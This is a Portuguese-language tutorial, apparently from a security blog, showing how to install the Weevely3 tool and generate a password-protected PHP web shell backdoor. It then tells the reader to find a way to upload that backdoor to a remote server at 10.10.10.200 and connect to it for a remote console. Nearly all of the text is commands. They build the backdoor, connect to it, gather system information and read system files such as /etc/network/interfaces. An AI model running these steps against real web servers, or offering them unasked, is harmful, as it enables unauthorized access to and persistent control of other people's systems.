O WEEVELY é uma ferramenta desenvolvida em Python que permite que um Backdoor seja gerado no formato .php e se executado em um host remoto pode obter o console do sistema.
Projeto : weevely.sourceforge.net
Instale alguns pacotes de dependências.
Linuxapt-get install g++ python-pip libyaml-dev python-dev
Atualize/Instale alguns pacotes Python.
Linuxpip install prettytable Mako pyaml dateutils readline PySocks –-upgrade
Realize o download do Weevely3.
git clone https://github.com/epinna/weevely3
Entre no diretório do weevely3 liste os arquivos.
cd weevely3/ ls -l
Execute a ferramenta weevely.py para gerar o backboor com a senha.
./weevely.py generate 100security arquivo.php
100security – Senha do arquivo.
arquivo.php – Backdoor
Pesquise no servidor web do host remoto 10.10.10.200 uma forma de fazer o upload do backdoor arquivo.php.
Execute a ferramenta weevely.py novamente informando o caminho completo do backdoor enviado.
./weevely.py http://10.10.10.200/enviar/arquivos/arquivo.php 100security
A conexão é realizada no servidor remoto com sucesso!
weevely>
Digite o comando :help para visualizar a lista de comandos disponíveis.
weevely> :help
Digite o comando cd para acessar os diretórios do servidor remoto.
weevely> cd
Digite novamente o comando :help para visualizar a lista de comandos disponíveis.
$ :help
Digite o comando :system_info para visualizar as informações do sistema.
$ :system_info
Digite o comando cd / para entrar no diretório raiz do sistema.
cd /
Digite o comando ls -l para listar os diretórios.
ls -l
Visualizar o conteúdo do arquivo interfaces para certificar que esta no servidor remoto.
cat /etc/network/interfaces